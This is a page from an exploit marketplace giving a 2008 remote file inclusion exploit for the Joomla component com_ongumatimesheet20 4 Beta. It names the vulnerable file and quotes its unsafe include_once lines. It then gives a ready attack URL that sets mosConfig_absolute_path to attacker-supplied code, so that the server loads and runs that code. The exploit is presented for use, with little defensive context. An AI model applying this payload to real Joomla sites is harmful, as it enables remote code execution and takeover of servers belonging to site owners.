[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component ongumatimesheet20 4b RFI Vulnerability

Author
NoGe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4053
Category
web applications
Date add
04-11-2008
Platform
unsorted
=======================================================
Joomla Component ongumatimesheet20 4b RFI Vulnerability
=======================================================


=======================================================================================================================================


  [o] com_ongumatimesheet20 4 Beta Remote File Inclusion Vulnerability

       Software : com_ongumatimesheet20 version 4 Beta
       Download : http://joomlacode.org/gf/project/ongumasa/frs/
       Author   : NoGe
       Blog     : http://evilc0de.blogspot.com [promosi :p]


=======================================================================================================================================


  [o] Vulnerable file

       administrator/components/com_ongumatimesheet20/lib/onguma.class.php

        include_once($mosConfig_absolute_path.'/includes/patTemplate/patError.php');
        include_once($mosConfig_absolute_path.'/includes/patTemplate/patErrorManager.php');
        include_once($mosConfig_absolute_path.'/includes/patTemplate/patTemplate.php');



  [o] Exploit

       http://localhost/[path]/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=[evilcode]


=======================================================================================================================================




#  0day.today [2024-10-06]  #